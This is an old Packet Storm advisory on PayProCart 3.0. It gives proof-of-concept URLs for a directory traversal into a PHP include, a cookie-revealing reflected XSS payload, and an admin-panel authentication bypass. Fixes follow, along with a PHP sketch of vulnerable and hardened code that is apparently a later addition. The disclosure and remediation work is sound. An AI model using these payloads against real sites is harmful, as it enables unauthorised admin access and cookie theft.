PayProCart30.txt

2005-04-17T00:00:00
ID PACKETSTORM:36998
Type packetstorm
Reporter Diabolic Crab
Modified 2005-04-17T00:00:00

Description

                                        
`-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1  
  
Dcrab's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc.
Learn more at http://www.digitalparadox.org/services.ah
  
Severity: High
Title: Authentication bypass, directory traversal and XSS vulnerabilities in PayProCart 3.0 - Profitcode Software
Date: 05/04/2005

Vendor: Profitcode Software
Vendor Website: http://www.profitcode.net
Summary: PayProCart 3.0 (Profitcode Software) is affected by an authentication bypass, a directory traversal that reaches a PHP include() call, and a reflected cross-site scripting vulnerability.
  
Proof of Concept Exploits:

http://localhost/index.php?modID=../EVIL_VALUE
Directory traversal. The modID value is concatenated into a file path and passed to include() at index.php line 159, as the PHP warnings below show. The script prepends "tplates/" and appends ".php", so only files ending in .php can be reached this way, but "../" sequences are not filtered:
Warning: main(tplates/../EVIL_VALUE.php) [function.main]: failed to open stream: No such file or directory in /home/*******/web/*******/index.php on line 159

Warning: main() [function.include]: Failed opening 'tplates/../EVIL_VALUE.php' for inclusion (include_path='.:/usr/local/lib/php') in /home/*******/web/*******/index.php on line 159

http://localhost/usrdetails.php?sgnuptype=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Reflected cross-site scripting. The sgnuptype parameter is echoed into the page unencoded; the payload ("><script>alert(document.cookie)</script>) is chosen to close a double-quoted attribute value and pops the document cookie.

http://localhost/adminshop/index.php?proMod=index&ftoedit=../shopincs/maintopENG
Authentication bypass, giving access to the admin control panel. Load the URL and press Stop after a couple of seconds: the last screen rendered is the administration panel, and you now have admin access to the shopping cart. The ftoedit parameter also carries a "../" traversal sequence into the admin module.
  
  
Possible Fixes: Encode user input with htmlspecialchars() before echoing it into the page, which closes the XSS. Escaping functions such as mysql_escape_string() and mysql_real_escape_string() protect only database queries and do nothing for the other two issues: the traversal needs the modID value validated against a list of known module names (or reduced with basename() and checked) before it is used in include(), and the admin bypass needs adminshop/ to stop executing when the login check fails, before any of the control panel is rendered.
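The three issues from the proof-of-concept section and the fixes above, side by side as a PHP sketch added here for illustration; this is not PayProCart's code. Only the file and parameter names (index.php/modID, tplates/, usrdetails.php/sgnuptype, adminshop/) and the include() shape revealed by the PHP warnings come from the advisory. The module list, the assumption that sgnuptype is reflected inside a double-quoted attribute, and the assumption that the admin bypass is a login redirect without exit are mine.

```php
<?php
// Illustrative code, not PayProCart's source. Names taken from the advisory's
// PoC URLs and PHP warnings; everything around them is assumed.

// --- 1. Module include (index.php, modID) ---------------------------------
// What "main(tplates/../EVIL_VALUE.php) ... on line 159" implies: only the
// prefix and the .php suffix are fixed, the middle is attacker-controlled.
function include_module_vulnerable(string $modID): string
{
    return 'tplates/' . $modID . '.php';   // then: include($path);
}

// Hardened: resolve modID against an allow-list of known modules. The names
// are assumed; the point is that unknown values never reach the filesystem.
const MODULES = ['home', 'catalog', 'cart', 'checkout'];

function include_module_hardened(string $modID): string
{
    if (!in_array($modID, MODULES, true)) {
        $modID = 'home';                   // default module instead of a path
    }
    return 'tplates/' . $modID . '.php';
}

// --- 2. Reflected XSS (usrdetails.php, sgnuptype) --------------------------
// The PoC payload starts with "> so the value is assumed to land inside a
// double-quoted attribute; the vulnerable form echoes it as-is.
function render_signup_type_vulnerable(string $sgnuptype): string
{
    return '<input type="hidden" name="sgnuptype" value="' . $sgnuptype . '">';
}

function render_signup_type_hardened(string $sgnuptype): string
{
    // ENT_QUOTES encodes both " and ' so the value cannot close the attribute.
    $safe = htmlspecialchars($sgnuptype, ENT_QUOTES, 'ISO-8859-1');
    return '<input type="hidden" name="sgnuptype" value="' . $safe . '">';
}

// --- 3. Admin guard (adminshop/index.php) ----------------------------------
// The advisory says the panel shows if you press Stop shortly after loading.
// A guard that sends a redirect but keeps executing behaves like that; this
// is an assumed cause, not something the advisory states.
function require_admin_vulnerable(bool $loggedIn): bool
{
    if (!$loggedIn) {
        header('Location: login.php');     // no exit: body is still rendered
    }
    return true;
}

function require_admin_hardened(bool $loggedIn): bool
{
    if (!$loggedIn) {
        header('Location: login.php');
        exit;                              // nothing after this is sent
    }
    return true;
}

// --- demo with the advisory's own PoC values ------------------------------
if (PHP_SAPI === 'cli') {
    echo include_module_vulnerable('../EVIL_VALUE'), "\n";
    echo include_module_hardened('../EVIL_VALUE'), "\n";
    $xss = '"><script>alert(document.cookie)</script>';
    echo render_signup_type_vulnerable($xss), "\n";
    echo render_signup_type_hardened($xss), "\n";
}
```

Run it with `php` on the command line to see the vulnerable and hardened outputs for the two PoC values; the admin guard functions call header() and so are only meaningful inside a web request.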
  
Keep yourself updated, RSS feed at: http://digitalparadox.org/rss.ah

Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com; please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/. Look out for my soon to come out book on Secure coding with PHP.
-----BEGIN PGP SIGNATURE-----  
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com  
  
iQA/AwUBQlFhqSZV5e8av/DUEQIgwACgxNEQ+C4Sy3x6of/R5CF+klPpNEEAoJi3  
UzBEsLKM5uDraMzb/rNUUrRU  
=zUyN
-----END PGP SIGNATURE-----  
  
`